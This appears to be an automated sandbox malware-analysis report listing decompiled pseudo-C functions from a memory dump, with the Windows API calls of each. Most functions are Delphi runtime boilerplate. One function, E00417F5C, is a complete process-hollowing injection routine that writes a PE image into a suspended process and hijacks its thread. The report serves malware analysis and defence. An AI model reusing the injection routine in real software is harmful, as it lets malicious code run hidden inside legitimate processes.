    						E00403AB8();
    						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    							_t14 =  *0x00454640;
    							if( *0x00454640 != 0) {
    								E0040532C(_t14);
    								_t35 =  *((intOrPtr*)(0x454640));
    								_t7 = _t35 + 0x10; // 0x400000
    								_t24 =  *_t7;
    								_t8 = _t35 + 4; // 0x400000
    								if(_t24 !=  *_t8 && _t24 != 0) {
    									FreeLibrary(_t24);
    								}
    							}
    						}
    						E00403A90();
    						if( *((char*)(0x454658)) == 1) {
    							 *0x00454654();
    						}
    						if( *((char*)(0x454658)) != 0) {
    							E00403C60();
    						}
    						if( *0x454630 == 0) {
    							if( *0x454024 != 0) {
    								 *0x454024();
    							}
    							ExitProcess( *0x419000); // executed
    						}
    						memcpy(0x454630,  *0x454630, 0xb << 2);
    						_t45 = _t45 + 0xc;
    						0x419000 = 0x419000;
    					}
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L3;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D14() {
    				intOrPtr* _t13;
    				struct HINSTANCE__* _t27;
    				void* _t36;
    				intOrPtr _t39;
    				void* _t52;
    
    				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L5:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t36);
    						 *0x419004 = 0;
    					}
    					L7:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t17 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t17);
    							_t39 =  *((intOrPtr*)(0x454640));
    							_t7 = _t39 + 0x10; // 0x400000
    							_t27 =  *_t7;
    							_t8 = _t39 + 4; // 0x400000
    							if(_t27 !=  *_t8 && _t27 != 0) {
    								FreeLibrary(_t27);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t52 = _t52 + 0xc;
    					0x419000 = 0x419000;
    					goto L7;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L5;
    				}
    			}









    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D18() {
    				struct HINSTANCE__* _t26;
    				void* _t35;
    				intOrPtr _t38;
    				void* _t51;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L4:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t35);
    						 *0x419004 = 0;
    					}
    					L6:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t16 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t16);
    							_t38 =  *((intOrPtr*)(0x454640));
    							_t7 = _t38 + 0x10; // 0x400000
    							_t26 =  *_t7;
    							_t8 = _t38 + 4; // 0x400000
    							if(_t26 !=  *_t8 && _t26 != 0) {
    								FreeLibrary(_t26);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t51 = _t51 + 0xc;
    					0x419000 = 0x419000;
    					goto L6;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L4;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
    				char _v1032;
    				int _t13;
    				void* _t22;
    
    				_t21 = __edx;
    				if(__eax != 0) {
    					if( *(__eax + 4) >= 0x10000) {
    						return E00404080(__edx,  *(__eax + 4));
    					}
    					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
    					return E00403F78(_t21, _t13, _t22);
    				}
    				return __eax;
    			}







    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
    				char _v272;
    				intOrPtr _t14;
    				void* _t16;
    				intOrPtr _t18;
    				intOrPtr _t19;
    
    				_t16 = __eax;
    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
    					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
    					_t14 = E00404FC0(_t19); // executed
    					_t18 = _t14;
    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
    					if(_t18 == 0) {
    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
    					}
    				}
    				return  *((intOrPtr*)(_t16 + 0x10));
    			}









    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
    				void* _t3;
    				void* _t6;
    
    				if(__eax <= 0) {
    					_t6 = 0;
    				} else {
    					_t3 =  *0x41903c(); // executed
    					_t6 = _t3;
    					if(_t6 == 0) {
    						E00402778(1);
    					}
    				}
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
    				void* _t6;
    				intOrPtr _t7;
    
    				_t7 = __edx;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454638 = __eax;
    				 *0x45463c = 0;
    				 *0x454640 = __edx;
    				_t1 = _t7 + 4; // 0x400000
    				 *0x45402c =  *_t1;
    				E00403A70();
    				 *0x454034 = 0; // executed
    				_t6 = E00403B18(); // executed
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
    				intOrPtr _v8;
    				char _v12;
    				CONTEXT* _v16;
    				void* _v20;
    				void _v24;
    				void _v28;
    				long _v32;
    				struct _PROCESS_INFORMATION _v48;
    				struct _STARTUPINFOA _v116;
    				CHAR* _t95;
    				short* _t171;
    				intOrPtr _t182;
    				intOrPtr _t189;
    				intOrPtr* _t194;
    				short* _t196;
    				void* _t197;
    				void* _t199;
    				void* _t200;
    				intOrPtr _t201;
    				void* _t215;
    
    				_t215 = __fp0;
    				_t199 = _t200;
    				_t201 = _t200 + 0xffffff90;
    				_t196 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t199);
    				_push(0x418218);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t201;
    				if(_v12 != 0) {
    					_push(0x418230);
    					_push(_v8);
    					_push(0x41823c);
    					_push(_v12);
    					E00404208();
    				}
    				 *_a4 = 0;
    				_t171 = _t196;
    				if( *_t171 == 0x5a4d) {
    					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
    					if( *_t194 == 0x4550) {
    						E00402B60( &_v116, 0x44);
    						E00402B60( &_v48, 0x10);
    						_v116.cb = 0x44;
    						_v116.dwFlags = 1;
    						_v116.wShowWindow = 0;
    						_t95 = E00404348(_v12);
    						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
    							 *_a4 = _v48.dwProcessId;
    							_v16 = E00417F28( &_v20);
    							if(_v16 != 0) {
    								_v16->ContextFlags = 0x10007;
    								if(GetThreadContext(_v48.hThread, _v16) != 0) {
    									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
    									if( *(_t194 + 0x34) != _v24) {
    										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    									} else {
    										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
    											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
    										} else {
    											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    										}
    									}
    									_t210 = _v28;
    									if(_v28 != 0) {
    										_t197 = E00417EA4(_t196, _t210);
    										_t125 = _v28;
    										if( *(_t194 + 0x34) != _v28) {
    											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
    											 *(_t194 + 0x34) = _v28;
    											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
    										}
    										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
    										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
    										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
    										SetThreadContext(_v48.hThread, _v16);
    										ResumeThread(_v48.hThread);
    										WaitForSingleObject(_v48.hThread, 0xffffffff);
    										_push(_t199);
    										_push(0x4181d0);
    										_push( *[fs:eax]);
    										 *[fs:eax] = _t201;
    										TerminateThread(_v48.hProcess, 0);
    										CloseHandle(_v48.hProcess);
    										_pop(_t189);
    										 *[fs:eax] = _t189;
    									}
    								}
    								VirtualFree(_v20, 0, 0x8000);
    							}
    							if( *_a4 == 0) {
    								TerminateProcess(_v48, 0);
    							}
    						}
    					}
    				}
    				_pop(_t182);
    				 *[fs:eax] = _t182;
    				_push(E0041821F);
    				return E00403EAC( &_v12, 2);
    			}
























    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				struct _WIN32_FIND_DATAA _v334;
    				char _v595;
    				void* _t45;
    				char* _t54;
    				char* _t64;
    				void* _t83;
    				intOrPtr* _t84;
    				char* _t90;
    				struct HINSTANCE__* _t91;
    				char* _t93;
    				void* _t94;
    				char* _t95;
    				void* _t96;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = _v8;
    				_t91 = GetModuleHandleA("kernel32.dll");
    				if(_t91 == 0) {
    					L4:
    					if( *_v8 != 0x5c) {
    						_t93 = _v8 + 2;
    						goto L10;
    					} else {
    						if( *((char*)(_v8 + 1)) == 0x5c) {
    							_t95 = E00404DF4(_v8 + 2);
    							if( *_t95 != 0) {
    								_t14 = _t95 + 1; // 0x1
    								_t93 = E00404DF4(_t14);
    								if( *_t93 != 0) {
    									L10:
    									_t83 = _t93 - _v8;
    									_push(_t83 + 1);
    									_push(_v8);
    									_push( &_v595);
    									L00401248();
    									while( *_t93 != 0) {
    										_t90 = E00404DF4(_t93 + 1);
    										_t45 = _t90 - _t93;
    										if(_t45 + _t83 + 1 <= 0x105) {
    											_push(_t45 + 1);
    											_push(_t93);
    											_push( &(( &_v595)[_t83]));
    											L00401248();
    											_t94 = FindFirstFileA( &_v595,  &_v334);
    											if(_t94 != 0xffffffff) {
    												FindClose(_t94);
    												_t54 =  &(_v334.cFileName);
    												_push(_t54);
    												L00401250();
    												if(_t54 + _t83 + 1 + 1 <= 0x105) {
    													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
    													_push(0x105 - _t83 - 1);
    													_push( &(_v334.cFileName));
    													_push( &(( &(( &_v595)[_t83]))[1]));
    													L00401248();
    													_t64 =  &(_v334.cFileName);
    													_push(_t64);
    													L00401250();
    													_t83 = _t83 + _t64 + 1;
    													_t93 = _t90;
    													continue;
    												}
    											}
    										}
    										goto L17;
    									}
    									_push(_v12);
    									_push( &_v595);
    									_push(_v8);
    									L00401248();
    								}
    							}
    						}
    					}
    				} else {
    					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
    					if(_t84 == 0) {
    						goto L4;
    					} else {
    						_push(0x105);
    						_push( &_v595);
    						_push(_v8);
    						if( *_t84() == 0) {
    							goto L4;
    						} else {
    							_push(_v12);
    							_push( &_v595);
    							_push(_v8);
    							L00401248();
    						}
    					}
    				}
    				L17:
    				return _v16;
    			}




















    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
    				char _v11;
    				char _v16;
    				intOrPtr _t28;
    				void* _t31;
    				void* _t33;
    
    				_t33 = __eflags;
    				_v16 = 0;
    				_push(_t31);
    				_push(0x40b318);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t31 + 0xfffffff4;
    				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
    				E004040F8( &_v16, 7,  &_v11);
    				_push(_v16);
    				E00407174(7, GetACP(), _t33);
    				_pop(_t28);
    				 *[fs:eax] = _t28;
    				_push(E0040B31F);
    				return E00403E88( &_v16);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
    				char _v260;
    				intOrPtr _t10;
    				void* _t18;
    
    				_t18 = __ecx;
    				_t10 = _a4;
    				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
    					return E00403EDC(_t10, _t18);
    				}
    				return E00403F78(_t10, _t5 - 1,  &_v260);
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
    				char _v16;
    				char _t5;
    				char _t6;
    
    				_push(__ecx);
    				_t6 = __ecx;
    				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
    					_t5 = _t6;
    				} else {
    					_t5 = _v16;
    				}
    				return _t5;
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
